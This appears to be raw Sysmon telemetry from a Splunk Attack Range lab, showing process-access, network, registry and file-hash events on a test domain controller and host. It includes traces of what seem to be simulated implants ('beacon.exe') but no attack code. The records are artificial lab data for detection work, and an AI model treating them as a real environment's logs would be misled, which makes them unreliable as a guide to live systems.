12:24:42.993{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-092A-00000000BB01}6536C:\Windows\system32\TSTheme.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292119Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.993{BEA10069-D0C2-6086-1000-00000000BB01}9445216C:\Windows\system32\svchost.exe{BEA10069-028A-6088-092A-00000000BB01}6536C:\Windows\system32\TSTheme.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292118Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.993{BEA10069-D0C2-6086-1000-00000000BB01}9441148C:\Windows\system32\svchost.exe{BEA10069-028A-6088-092A-00000000BB01}6536C:\Windows\system32\TSTheme.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000292506Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.895{BEA10069-D0B7-6086-0100-00000000BB01}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255ip-10-0-1-255.us-west-2.compute.internal137netbios-nsfalse10.0.1.15win-host-96.attackrange.local137netbios-ns 354300x8000000000000000292505Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.895{BEA10069-D0B7-6086-0100-00000000BB01}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.15win-host-96.attackrange.local137netbios-nsfalse10.0.1.255ip-10-0-1-255.us-west-2.compute.internal137netbios-ns 354300x8000000000000000292504Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.853{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50632-false20.188.78.187-443https 23542300x8000000000000000292503Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:44.813{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4E8401E3DDF8FA7B7176FC01AECB406,SHA256=0B05E62FF0FB93AD519FAFC5983705BAD4B05BDDA56D08D0996EC33EB80E07E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292502Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:44.339{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F6750013338876EE9E9D554AD267BB8F,SHA256=916B4E68FC2472E783005CD3C1236A34AF2AA7566D12D11C28FD3B8AA9EC96A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292501Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:44.196{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=8AF888EE00B7717100B15FF759A2B270,SHA256=BB54D2ACE80B74F24782078E4A6D8BEF990BCFF07C5781440A82DF13834B4AB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441221Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.815{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EBD427987BE2463031D92B11F577A21,SHA256=4B0F8353CEAD32DEFF0E23EC095D85DD3E5E3F457F9880FE203F56FB7E301987,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441220Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.639{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B7CCB92A2FA56AE1769ABC02C3EEA89D,SHA256=E8F4491896B627F771AF756F2557DA9E0A6D6392CD87D951E3D8FBAE0AEA217E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441219Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.638{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=32EDCD660629312CD14F7B9E2A38778F,SHA256=11F585D0008C0628C77DF8B3E331C6E5217FD2D717C876DBBE9D436808A6A0C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441218Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.610{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=452C4E68C5110495B9AB7C5550480B67,SHA256=E20A18292144DE723F1E7D310FD8077B6CDF74476DA19519B9C861ED5067BC5F,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000441217Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.localT1122SetValue2021-04-27 12:24:44.316{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exeHKCR\WOW6432Node\CLSID\{A1BD40BB-7563-461C-9124-B0E901BCD669}\InProcServer32\(Default)%%SystemRoot%%\system32\shdocvw.dll 13241300x8000000000000000441216Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.localT1122SetValue2021-04-27 12:24:44.315{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exeHKCR\CLSID\{A1BD40BB-7563-461C-9124-B0E901BCD669}\InProcServer32\(Default)%%SystemRoot%%\system32\shdocvw.dll 23542300x8000000000000000441215Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.296{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFC95D4A3FAD065696A2108E94CACE88,SHA256=AED5D3C53A7F57E2B1C8337E314503D225AF730E56799ADED45D94EAAED2E9DC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441214Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.261{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-028C-6088-CA28-00000000BA01}6412C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441213Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.253{42DC5269-CE96-6086-0500-00000000BA01}412528C:\Windows\system32\csrss.exe{42DC5269-028C-6088-CA28-00000000BA01}6412C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000441212Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.252{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-028C-6088-CA28-00000000BA01}6412C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441211Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.240{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C628-00000000BA01}1280C:\Windows\system32\TSTheme.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441210Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.240{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-15AB-6087-FD0C-00000000BA01}5180C:\Users\Administrator\Desktop\beacon2.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441209Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.240{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-1583-6087-F40C-00000000BA01}5820C:\Program Files\OpenJDK\jdk-16.0.1\bin\java.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441208Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.240{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-1427-6087-BD0C-00000000BA01}912C:\Windows\system32\conhost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441207Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.240{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-1427-6087-BC0C-00000000BA01}304C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441206Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.240{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-FB8D-6086-DA09-00000000BA01}520C:\Users\Administrator\Desktop\beacon.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441205Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.240{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-E2C5-6086-F106-00000000BA01}6012C:\Users\Administrator\Desktop\beacon.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441204Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.240{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-DE59-6086-6C06-00000000BA01}6620C:\Users\Administrator\Desktop\beacon.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441203Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.240{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-DE09-6086-6306-00000000BA01}2248C:\Users\Administrator\Desktop\beacon.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441202Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.240{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-DD12-6086-4606-00000000BA01}3432C:\Users\Administrator\Desktop\beacon.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441201Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.240{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-DC40-6086-2F06-00000000BA01}4580C:\Users\Administrator\Desktop\beacon.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441200Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.240{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-DBB1-6086-1806-00000000BA01}4432C:\Users\Administrator\Desktop\beacon.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441199Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.240{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-DB54-6086-1006-00000000BA01}6020C:\Users\Administrator\Desktop\beacon.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441198Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.239{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-D6F1-6086-8605-00000000BA01}5864C:\Windows\system32\conhost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441197Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.239{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-D6F1-6086-8505-00000000BA01}5444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441196Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.239{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441195Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.239{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441194Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.239{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441193Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.239{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-D4CE-6086-F304-00000000BA01}4356C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441192Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.239{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-D4CE-6086-F004-00000000BA01}2052C:\Windows\System32\rdpclip.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441191Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.239{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-D4CD-6086-EC04-00000000BA01}4652C:\Windows\system32\dwm.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441190Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.239{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-D4CC-6086-EA04-00000000BA01}2548C:\Windows\system32\winlogon.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441189Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.239{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CF49-6086-E100-00000000BA01}4048C:\Program 